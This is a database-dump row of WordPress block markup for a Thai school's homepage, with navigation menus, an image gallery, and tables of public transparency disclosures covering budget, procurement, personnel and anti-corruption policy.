(365,1,'2024-08-01 15:43:35','2024-08-01 08:43:35','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"f2a87680\",\"mediaId\":23,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f2a87680\"><img class=\"gb-image gb-image-f2a87680\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/โรงเรียนบ้านโคกสะอาด.png\" alt=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\" title=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"link\":\"http://pakhaeng.ssk.in.th/?post_type=popupbuilder\\u0026p=328\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_add57c-9d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_add57c-9d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_745a05-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_745a05-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_1e894c-db\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_1e894c-db\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ประวัติโรงเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_3cdb23-c1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_3cdb23-c1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_92a3d1-5f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_92a3d1-5f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_225b86-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_225b86-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?post_type=popupbuilder&amp;p=328\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_e92ee9-59\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_e92ee9-59\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลบุคลากร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_91c788-64\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_91c788-64\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลนักเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_5a5d38-a9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_5a5d38-a9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูล O-NET</span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e5e0c341\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"9l7bo6vn\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showTaxonomy\":false,\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"showPagination\":true,\"postsPerPage\":\"2\",\"headingText\":\"วิดีโอกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"headingHide\":false,\"category-terms\":[{\"label\":\"วิดีโอกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%a7%e0%b8%b4%e0%b8%94%e0%b8%b5%e0%b9%82%e0%b8%ad%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}]} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"author\":[],\"offset\":\"0\",\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingColor\":\"#ffffff\",\"headingHoverColor\":\"#ffffff\",\"headingBgColor\":\"#2d27a1\",\"headingHoverBgColor\":\"#abb8c3\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleHoverColor\":\"#0693e3\",\"titleBgColor\":\"#ffffff\",\"titleHoverBgColor\":\"#8ed1fc\",\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>โครงสร้าง</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?post_type=popupbuilder&amp;p=328\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong>อำนาจหน้าที่</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\" data-type=\"page\" data-id=\"355\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=337\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=337\">Q&amp;A</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong>E-Service</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานผลการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy 